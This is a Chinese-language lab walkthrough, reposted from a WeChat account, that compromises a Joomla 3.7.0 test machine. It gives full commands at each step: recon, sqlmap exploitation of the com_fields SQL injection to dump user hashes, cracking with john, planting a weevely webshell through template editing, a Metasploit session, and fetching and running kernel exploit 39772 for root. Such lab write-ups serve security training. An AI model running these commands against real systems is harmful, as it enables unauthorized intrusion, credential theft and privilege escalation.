DC全解,从信息搜集到提权上线

admin 2024年8月20日13:15:34评论17 views字数 2762阅读9分12秒阅读模式

1

信息搜集

My Diary 2024

首先我们做一个简单的信息搜集,使用的工具:

arp-scanwhatwebnmapWappalyzerjoomscan

这里我们模拟一下,这个场景,其实相当于我们扫描内网中的主机,然后针对存活主机进行检测,发现这是一个网站。

我们首先用到arp-scan来扫描内网存活主机

arp-scan -l

DC全解,从信息搜集到提权上线

其实这里我们在windows环境中可以使用arp -an来检测存活主机

arp -an

DC全解,从信息搜集到提权上线

这里我们确定一下目标机器ip是192.168.119.158

那么我们就可以进行扫描端口的操作。

使用工具nmap进行扫描

我这里扫描一个端口号和系统信息

nmap -O -p- IP

DC全解,从信息搜集到提权上线

这里可以发现开启了80端口,可以知道这个是一个网站了,我们访问这个网站

DC全解,从信息搜集到提权上线

我们继续对这个网站进行一下信息搜集

网站指纹的识别我们可以使用nmap,使用-A参数即可

DC全解,从信息搜集到提权上线

或者使用whatweb来识别

DC全解,从信息搜集到提权上线

其实实战中whatweb比较拉跨,比较新的cms很难识别出来,可以选择一些在线的比如云悉,潮汐(http://finger.tidesec.net/)等等,云悉有点脑残就是了。

根据信息搜集


Mid-Autumn

Festival

寻找相关漏洞


废话结束,我们知道了这个cms类型之后,有专门针对这个cms的工具,kali中没有可以自行安装一下就好了。

joomscan工具

joomscan --url http://192.168.119.158

扫描之后我们发现了对应的版本号和他的后台

DC全解,从信息搜集到提权上线

既然知道了版本号那么我们就来搜索一下这个版本有什么漏洞没有

searchsploit joomla 3.7.0

DC全解,从信息搜集到提权上线

这里我们尝试使用第一个sql的漏洞,我们找到位置

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

这里加粗下划线的位置是固定的,具体位置我们可以看后面的path,拼接到这个固定位置后面就可以了

DC全解,从信息搜集到提权上线

这里告诉我们要用sqlmap,同时也将使用语句给我们了,我们直接复制出来u使用

sqlmap -u "http://192.168.119.158/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

当然IP地址记得换,过程中一律选择y就好了

DC全解,从信息搜集到提权上线

我们按照顺序来就好了

sqlmap -u "http://192.168.119.158/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

这里的表我们当然是爆破users表了,这里有一个点,就是这里的表名前面都有一个#,这个会注释掉sqlmap后面的语句,我们需要使用引号括起来。

sqlmap -u "http://192.168.119.158/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

最后会出来

DC全解,从信息搜集到提权上线

我们选择名字和密码这两个字段

sqlmap -u "http://192.168.119.158/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump -p list[fullordering]

DC全解,从信息搜集到提权上线

这里是一段加密之后的密码,我们将其保存到txt文件中,然后使用john进行破解

john pass.txt

发现密码为snoopy

我们利用之前发现后台进行登录。



后台利用

Mid-Autumn Festival

这个后台的漏洞点在模板的编辑页面,这里允许我们进行php文件的编辑

DC全解,从信息搜集到提权上线

这里我们选择一个模板进入

DC全解,从信息搜集到提权上线

我这里选择第一个,我们可以添加一个新的页面,就在这个模板文件的根目录

DC全解,从信息搜集到提权上线

我们只需要设置一个php就好了

DC全解,从信息搜集到提权上线


这里我们测试一下phpinfo页面

DC全解,从信息搜集到提权上线

保存即可

这个网站的保存路径就是

http://192.168.119.158/templates/beez3/php.php

其实上面我们也能看到,就是多了个s

DC全解,从信息搜集到提权上线

访问成功,这里我们使用另一个工具来生成一个shell

weevely generate 11 webshell.phpweevely generate 密码 文件名

这个工具可以生成一个webshell

当然你有自己的写的也可以

DC全解,从信息搜集到提权上线

我们将这一段一句话木马写进去

然后我们使用工具进行连接

weevely http://192.168.119.158/template/beez3/a.php 111

DC全解,从信息搜集到提权上线

这里我们可以直接使用这个工具来连接就好了

提权

但是这里我们权限过低,我们来看看这个系统内核的版本

DC全解,从信息搜集到提权上线

内核版本是16.04,我们查询一下这个版本有没有什么漏洞

DC全解,从信息搜集到提权上线

这里我们使用39772这个内核漏洞利用方式

我这里利用weevely进行了msf的上线,操作方式就是上传msf木马运行上线,然后后面的操作我们就利用

msf进行操作,可以先美化一下msf的shell界面

python -c 'import pty;pty.spawn("/bin/bash")'

DC全解,从信息搜集到提权上线

然后我们通过上面的给的漏洞,这里他原本的下载地址已经没有了,换到了下面这个地址,我们可以直接在目标机器中下载

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

DC全解,从信息搜集到提权上线

我们解压之后进入到文件夹内,其实这里面用的到的是exploit.tar

我们解压之后再解压这个

DC全解,从信息搜集到提权上线

然后我们按照漏洞使用方式,依次运行下面两个命令

./compile.sh./doubleput

DC全解,从信息搜集到提权上线

最后我们到根目录中root下查看flag即可

DC全解,从信息搜集到提权上线


总结:

本次实验的学习点

1、查询内核的版本,并找到相关漏洞进行利用

2、joomlaCMS的漏洞查找利用

3、weevely一句话木马生成和利用工具


原文始发于微信公众号(白安全组):DC全解,从信息搜集到提权上线

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月20日13:15:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC全解,从信息搜集到提权上线https://cn-sec.com/archives/3082043.html

发表评论

匿名网友 填写信息